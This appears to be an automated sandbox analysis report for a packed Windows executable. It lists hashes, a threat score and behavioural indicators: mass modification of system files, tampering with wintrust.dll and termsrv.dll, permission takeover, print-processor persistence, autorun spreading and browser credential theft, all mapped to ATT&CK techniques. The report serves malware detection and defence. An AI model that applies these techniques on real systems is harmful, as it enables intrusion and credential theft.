d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97

Analysis

max time kernel
120s
max time network
16s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
01-12-2024 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe
Size

97KB
MD5

35d32ac777d694188d6bd2a89e541250
SHA1

6ee4cebbfc71483cd19e6dd01eceaa583cf976a1
SHA256

d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97
SHA512

4e2ac2282653247db5ab6983292b7fb529a86286ca868cef6b2ceb70450ec870a266eb8c21467a4eb04035fd0fc71ce5ffb36d2d0986233bdb1e6c2471ae5702
SSDEEP

3072:MwavFbFSymUJlum6XhJTeiWswHQVcScs7e3/0o:MnvFbFfV7udxteiWpQVcEe3M

Score

8^/10

discovery exploit persistence spyware stealer upx

Malware Config

Signatures

Drops file in Drivers directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\cdrom.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\ndisuio.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\serial.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\irenum.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usb8023.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ksecdd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\rdpbus.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\WUDFPf.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\Classpnp.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\BrSerId.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\usbhub.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\ndiscap.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\rndismp6.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\afd.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\scsiport.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\processr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\AGP440.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\rdvgkmd.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\dxgkrnl.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\srv.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\bthport.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\fltmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\pci.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\tsusbflt.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\mspclock.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\UMDF\it-IT\WpdMtpDr.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\pcmcia.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\srv.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\ntfs.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\tsusbflt.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\isapnp.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\mouhid.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\usbhub.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\portcls.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\ipnat.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\gm.dls	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\UAGP35.SYS.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\srv.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fsdepends.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\BrParwdm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\srv2.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\tcpip.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\cdfs.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\cdrom.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\wdf01000.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\pci.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\ndis.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\ntfs.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\amdppm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\bfe.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\partmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\scfilter.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\it-IT\fltmgr.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\ja-JP\mssmbios.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\termdd.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\tunnel.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\kbdhid.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\vwifibus.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\BrParwdm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\HdAudio.sys	cmd.exe
File opened for modification	C:\Windows\System32\drivers\de-DE\msdsm.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\en-US\afd.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\es-ES\i8042prt.sys.mui	cmd.exe
File opened for modification	C:\Windows\System32\drivers\fr-FR\hdaudbus.sys.mui	cmd.exe

Manipulates Digital Signatures 2 IoCs

Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.

description	ioc	Process
File opened for modification	C:\Windows\System32\wintrust.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\wintrust.dll	cmd.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
2756	takeown.exe
2796	icacls.exe

Boot or Logon Autostart Execution: Print Processors 1 TTPs 1 IoCs

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation.

persistence

Print Processors

T1547.012

description	ioc	Process
File opened for modification	C:\Windows\System32\spool\prtprocs\x64\winprint.dll	cmd.exe

Deletes itself 1 IoCs

pid	Process
2760	cmd.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2756	takeown.exe
2796	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 51 IoCs

description	ioc	Process
File opened for modification	C:\Windows\winsxs\AM3E43~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM814E~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM2473~1.163\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMB428~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM5043~1.164\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMD694~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMEE05~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMC04C~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMB6BD~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM15B7~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AME009~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM5CD3~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMF946~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMFD52~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM5C97~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMC003~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM076B~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AME19A~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM7B95~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM912A~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM1B18~1.163\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMC0AD~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM6927~1.175\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM50D0~1.175\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM2971~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM1464~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM131F~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMCCDB~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMCF3A~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMFF91~1.164\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM989B~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM9934~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM71C7~1.163\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMFA6B~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM9AF0~1.163\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMFB84~1.175\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM281C~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMAB03~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMCA4A~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM0FD6~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM425B~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM0353~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM3A5B~1.175\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM28D3~1.163\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM082E~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMB8AA~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMDF32~1.163\Desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMEEEB~1.163\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AM0112~1.175\desktop.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMA45F~1.175\desktop.ini	cmd.exe

Drops autorun.inf file 1 TTPs 1 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File opened for modification	C:\Windows\BITLOC~1\autorun.inf	cmd.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\sdohlp.dll	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\en-US\hidir.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\aepdu.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wbem\ja-JP\WmiApRes.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\wmploc.DLL	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\BRMFCW~1.INF\brmsl05f.bin	cmd.exe
File opened for modification	C:\Windows\System32\en-US\msprivs.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\migwiz\DLMANI~1\RPC-HTTP-DL.man	cmd.exe
File opened for modification	C:\Windows\SysWOW64\WINDOW~1\v1.0\en-US\Microsoft.PowerShell.Commands.Management.dll-Help.xml	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\fr-FR\usbcir.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\oleaccrc.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\WIACA0~2.INF\CNC980N.DAT	cmd.exe
File opened for modification	C:\Windows\System32\OpcServices.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\en-US\mdminst.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\wsdapi.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\telephon.cpl.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\drprov.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\migwiz\REPLAC~1\FailoverCluster-Core-WOW64-RM.man	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\dsuiext.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\comp.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\l3codeca.acm.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNKY0~1.INF\Amd64\KYCS3225.PPD	cmd.exe
File opened for modification	C:\Windows\System32\en-US\WUDFHost.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\WINDOW~1\v1.0\en-US\ImportAllModules.psd1	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\tcmsetup.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\de-DE\hidirkbd.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\CXRAPT~1.INF\cpnotify_raphd_IBV64.ax	cmd.exe
File opened for modification	C:\Windows\System32\ja-JP\userenv.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\migwiz\DLMANI~1\GroupPolicy-Admin-Gpedit-DL.man	cmd.exe
File opened for modification	C:\Windows\System32\Dism\it-IT\MsiProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\ANGEL2~1.INF\angel264.PNF	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PR7DAE~1.INF\Amd64\BRM867DN.GPD	cmd.exe
File opened for modification	C:\Windows\System32\migwiz\DLMANI~1\ActiveDirectory-WebServices-DL.man	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\wiaacmgr.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\nl-NL\comdlg32.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\de-DE\PerfCenterCPL.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\qmgr.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\ntmarta.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\sl-SI\comdlg32.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\msmpeg2enc.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\fr-FR\apircl.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\en-US\cngprovider.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\NET818~2.INF\net8187bv64.inf	cmd.exe
File opened for modification	C:\Windows\System32\en-US\packager.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\msrating.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\attrib.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\de-DE\UIRibbon.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\Dism\en-US\DmiProvider.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\KBDTIPRC.DLL	cmd.exe
File opened for modification	C:\Windows\System32\mtxex.dll	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNIN0~1.INF\Amd64\IF2550.GPD	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\ja-JP\brmfport.inf_loc	cmd.exe
File opened for modification	C:\Windows\System32\attrib.exe	cmd.exe
File opened for modification	C:\Windows\System32\en-US\WF.msc	cmd.exe
File opened for modification	C:\Windows\System32\fr-FR\SaMinDrv.dll.mui	cmd.exe
File opened for modification	C:\Windows\System32\WINDOW~1\v1.0\PowerShellTrace.format.ps1xml	cmd.exe
File opened for modification	C:\Windows\SysWOW64\ja-JP\gpupdate.exe.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\srhelper.dll	cmd.exe
File opened for modification	C:\Windows\SysWOW64\winbrand.dll	cmd.exe
File opened for modification	C:\Windows\System32\DRIVER~1\FILERE~1\PRNIN0~2.INF\Amd64\IFC404D6.GPD	cmd.exe
File opened for modification	C:\Windows\System32\es-ES\MdRes.exe.mui	cmd.exe
File opened for modification	C:\Windows\System32\WINDOW~1\v1.0\ja-JP\pspluginwkr.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\en-US\wmpdui.dll.mui	cmd.exe
File opened for modification	C:\Windows\SysWOW64\es-ES\rtffilt.dll.mui	cmd.exe

Modifies termsrv.dll 1 TTPs 1 IoCs

Commonly used to allow simultaneous RDP sessions.

Remote Desktop Protocol

T1021.001

description	ioc	Process
File opened for modification	C:\Windows\System32\termsrv.dll	cmd.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/3036-0-0x000000013FDF0000-0x000000013FE4A000-memory.dmp	upx
behavioral1/memory/3036-2-0x000000013FDF0000-0x000000013FE4A000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\FSDEFI~1\auxpad\auxbase.xml	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Pets\Pets_frame-imageMask.png	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Pets\Pets_frame-shadow.png	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\es\System.ServiceModel.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CPU~1.GAD\fr-FR\css\cpu.css	cmd.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\ink\micaut.dll	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\images\undocked_blue_partly-cloudy.png	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\es\UIAutomationTypes.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\SLIDES~1.GAD\de-DE\gadget.xml	cmd.exe
File opened for modification	C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.5\ja\System.Net.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\ACCESS~1\fr-FR\wordpad.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Full\NavigationLeft_ButtonGraphic.png	cmd.exe
File opened for modification	C:\PROGRA~1\WI54FB~1\MEDIAR~1\avtransport.xml	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CLOCK~1.GAD\ja-JP\js\clock.js	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CURREN~1.GAD\icon.png	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\PICTUR~1.GAD\en-US\js\picturePuzzle.js	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\SLIDES~1.GAD\ja-JP\js\slideShow.js	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\it-IT\js\settings.js	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\images\square_m.png	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\de-DE\InkWatson.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\sonicsptransform.ax	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\de\Microsoft.Build.Engine.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\images\settings_left_rest.png	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CALEND~1.GAD\es-ES\calendar.html	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CLOCK~1.GAD\images\modern_settings.png	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\images\24.png	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Travel\btn-next-static.png	cmd.exe
File opened for modification	C:\PROGRA~1\WINDOW~3\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\RSSFEE~1.GAD\fr-FR\settings.html	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\de-DE\js\highDpiImageSwap.js	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\de-DE\settings.html	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\ja-JP\settings.html	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\Vignette\NavigationRight_ButtonGraphic.png	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CPU~1.GAD\de-DE\cpu.html	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\Gadgets\CLOCK~1.GAD\fr-FR\js\settings.js	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\Gadgets\WEATHE~1.GAD\images\undocked_black_moon-waning-crescent_partly-cloudy.png	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\DEVICE~1\Device\{8702D~1\behavior.xml	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\fr\Microsoft.Build.Utilities.v3.5.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WI54FB~1\it-IT\wmlaunch.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\WEATHE~1.GAD\images\divider-horizontal.png	cmd.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\ink\de-DE\mip.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~2\COMMON~1\System\fr-FR\wab32res.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~3\MICROS~1\USERAC~1\DEFAUL~1\usertile16.bmp	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\ru-RU\tipresx.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\shadowonlyframe_buttongraphic.png	cmd.exe
File opened for modification	C:\PROGRA~1\WI0FCF~1\en-US\Journal.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WI0FCF~1\jnwdui.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WINDOW~4\es-ES\ImagingDevices.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~2\REFERE~1\MICROS~1\FRAMEW~1\v3.0\fr\System.RunTime.Serialization.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\TABLET~1\en-US\TableTextService.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CLOCK~1.GAD\images\flower_m.png	cmd.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Reader\Tracker\END_RE~1.GIF	cmd.exe
File opened for modification	C:\PROGRA~2\INTERN~1\F12Tools.dll	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\SR-LAT~1\tipresx.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\DVDMAK~1\Shared\DVDSTY~1\PERFOR~1\Notes_loop_PAL.wmv	cmd.exe
File opened for modification	C:\PROGRA~1\MICROS~1\Mahjong\MahjongMCE.png	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.0\fr\PresentationFramework.resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\es\System.Xml.Linq.Resources.dll	cmd.exe
File opened for modification	C:\PROGRA~1\REFERE~1\MICROS~1\FRAMEW~1\v3.5\System.Web.DynamicData.dll	cmd.exe
File opened for modification	C:\PROGRA~1\WI4223~1\Gadgets\CALEND~1.GAD\images\rings-dock.png	cmd.exe
File opened for modification	C:\PROGRA~2\Adobe\READER~1.0\Resource\Font\MINION~3.OTF	cmd.exe
File opened for modification	C:\PROGRA~2\WI4223~1\es-ES\Sidebar.exe.mui	cmd.exe
File opened for modification	C:\PROGRA~1\COMMON~1\MICROS~1\ink\en-US\micaut.dll.mui	cmd.exe
File opened for modification	C:\PROGRA~1\INTERN~1\D3DCompiler_47.dll	cmd.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\winsxs\AM4787~1.163\PCWDIA~1.XML	cmd.exe
File opened for modification	C:\Windows\Fonts\msgothic.ttc	cmd.exe
File opened for modification	C:\Windows\MICROS~1.NET\FRAMEW~1\V20~1.507\MmcAspExt.dll	cmd.exe
File opened for modification	C:\Windows\POLICY~1\es-ES\ErrorReporting.adml	cmd.exe
File opened for modification	C:\Windows\SERVIC~1\Packages\MIFFDF~1.CAT	cmd.exe
File opened for modification	C:\Windows\winsxs\AM49E6~1.163\46.png	cmd.exe
File opened for modification	C:\Windows\winsxs\FileMaps\$$DF43~1.CDF	cmd.exe
File opened for modification	C:\Windows\winsxs\AM8C8E~1.175\MSIMSG~1.MUI	cmd.exe
File opened for modification	C:\Windows\SERVIC~1\Packages\WI52D7~1.CAT	cmd.exe
File opened for modification	C:\Windows\winsxs\AM4F55~1.163\AUDITP~1.DLL	cmd.exe
File opened for modification	C:\Windows\winsxs\AMC671~1.163\APDE66~1.DLL	cmd.exe
File opened for modification	C:\Windows\winsxs\AM5061~1.163\NETB57~1.INF	cmd.exe
File opened for modification	C:\Windows\winsxs\AMEBFF~1.163\Amd64\CNBP_333.DLL	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM3F9C~2.MAN	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AMACF3~1.MAN	cmd.exe
File opened for modification	C:\Windows\SERVIC~1\Packages\MI3937~1.CAT	cmd.exe
File opened for modification	C:\Windows\winsxs\AMB38D~1.163\SE7B30~1.PNG	cmd.exe
File opened for modification	C:\Windows\winsxs\AMD4FA~1.163\TLNTSV~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\AMF83A~2.163\SPOLSC~1.CHM	cmd.exe
File opened for modification	C:\Windows\winsxs\FileMaps\$$F7EC~1.CDF	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM919E~1.MAN	cmd.exe
File opened for modification	C:\Windows\Help\Windows\en-US\rd.h1s	cmd.exe
File opened for modification	C:\Windows\winsxs\AMF0B3~1.163\license.rtf	cmd.exe
File opened for modification	C:\Windows\winsxs\FileMaps\$$E08A~1.CDF	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AME91F~1.MAN	cmd.exe
File opened for modification	C:\Windows\winsxs\AM0E52~1.175\CL_LOC~1.PSD	cmd.exe
File opened for modification	C:\Windows\winsxs\AM67B5~1.163\SHLWAP~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\AM8FB8~1.163\RDPCFG~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\AMABD8~1.175\WWANSV~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\Backup\AM1886~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM9FC7~1.MAN	cmd.exe
File opened for modification	C:\Windows\MICROS~1.NET\FRAMEW~2\v3.0\WINDOW~1\de-DE\ServiceModelEvents.dll.mui	cmd.exe
File opened for modification	C:\Windows\winsxs\AM8436~1.175\OSKMEN~1.XML	cmd.exe
File opened for modification	C:\Windows\winsxs\AMD650~2.163\WINDOW~1.ADM	cmd.exe
File opened for modification	C:\Windows\winsxs\AM456F~1.163\CLIP_1~1.MP4	cmd.exe
File opened for modification	C:\Windows\winsxs\AMF4D9~1.175\Amd64\P6FONT.GPD	cmd.exe
